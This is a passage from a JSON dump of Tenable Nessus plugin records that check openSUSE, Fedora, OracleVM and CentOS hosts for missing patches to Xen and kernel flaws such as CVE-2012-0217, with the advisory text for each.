attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=701686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=704160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=706106\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=706574\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.novell.com/show_bug.cgi?id=708025\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=712051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=712823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=714183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=715655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=716695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=725169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=726332\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=727515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=732782\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=734826\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=736824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=739585\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=740165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=746702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-debugsource-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-devel-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-doc-html-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-doc-pdf-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-default-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-default-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-desktop-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-desktop-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-pae-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", 
reference:\"xen-kmp-pae-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-libs-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-libs-debuginfo-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-debuginfo-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-domU-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-domU-debuginfo-4.0.3_04-42.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-debugsource / xen-devel / xen-doc-html / xen-doc-pdf / etc\");\n}\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:43", "description": "make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 15 : xen-4.1.2-8.fc15 (2012-9430)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "modified": "2012-06-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-9430.NASL", "href": "https://www.tenable.com/plugins/nessus/59696", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9430.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59696);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9430\");\n\n script_name(english:\"Fedora 15 : xen-4.1.2-8.fc15 (2012-9430)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082752.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebc2ae1d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"xen-4.1.2-8.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:43", "description": "make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 16 : xen-4.1.2-8.fc16 (2012-9399)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "modified": "2012-06-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-9399.NASL", "href": "https://www.tenable.com/plugins/nessus/59693", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9399.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59693);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9399\");\n\n script_name(english:\"Fedora 16 : xen-4.1.2-8.fc16 (2012-9399)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082754.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f18b6bbe\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"xen-4.1.2-8.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:10", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2012-0217 CVE-2012-0218: guest DoS on\n syscall/sysenter exception generation [orabug 13993157]", "edition": 29, "published": "2014-11-26T00:00:00", "title": "OracleVM 2.2 : xen (OVMSA-2012-0022)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218"], "modified": "2014-11-26T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:xen-64", "p-cpe:/a:oracle:vm:xen-devel", "p-cpe:/a:oracle:vm:xen-debugger", "cpe:/o:oracle:vm_server:2.2", "p-cpe:/a:oracle:vm:xen-pvhvm-devel", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "id": "ORACLEVM_OVMSA-2012-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/79478", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2012-0022.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79478);\n script_version(\"1.10\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\");\n script_bugtraq_id(53856, 53955);\n\n script_name(english:\"OracleVM 2.2 : xen (OVMSA-2012-0022)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2012-0217 CVE-2012-0218: guest DoS on\n syscall/sysenter exception generation [orabug 13993157]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2012-June/000084.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-64\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-debugger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-pvhvm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-64-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-debugger-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-devel-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-pvhvm-devel-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-tools-3.4.0-0.1.39.el5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-64 / xen-debugger / xen-devel / xen-pvhvm-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:27:45", "description": "Updated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* It was found that the Xen hypervisor implementation as shipped with\nRed Hat Enterprise Linux 5 did not properly restrict the syscall\nreturn addresses in the sysret return path to canonical addresses. An\nunprivileged user in a 64-bit para-virtualized guest, that is running\non a 64-bit host that has an Intel CPU, could use this flaw to crash\nthe host or, potentially, escalate their privileges, allowing them to\nexecute arbitrary code at the hypervisor level. (CVE-2012-0217,\nImportant)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs,\nleading to a CPU hard lockup, when running on the Xen hypervisor\nimplementation. An unprivileged user in a 64-bit para-virtualized\nguest could use this flaw to crash the host. Warning: After installing\nthis update, hosts that are using an affected AMD CPU (refer to Red\nHat Bugzilla bug #824966 for a list) will fail to boot. In order to\nboot such hosts, the new kernel parameter, allow_unsafe, can be used\n('allow_unsafe=on'). This option should only be used with hosts that\nare running trusted guests, as setting it to 'on' reintroduces the\nflaw (allowing guests to crash the host). (CVE-2012-2934, Moderate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users\ncan exploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these\nissues. Upstream acknowledges Rafal Wojtczuk as the original reporter\nof CVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. 
The system must be\nrebooted for this update to take effect.", "edition": 26, "published": "2012-06-14T00:00:00", "title": "CentOS 5 : kernel (CESA-2012:0721)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "modified": "2012-06-14T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel-PAE-devel", "p-cpe:/a:centos:centos:kernel-xen-devel", "p-cpe:/a:centos:centos:kernel-xen", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-headers", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:kernel-PAE", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2012-0721.NASL", "href": "https://www.tenable.com/plugins/nessus/59479", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0721 and \n# CentOS Errata and Security Advisory 2012:0721 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59479);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-2934\");\n script_bugtraq_id(53961);\n script_xref(name:\"RHSA\", value:\"2012:0721\");\n\n script_name(english:\"CentOS 5 : kernel (CESA-2012:0721)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
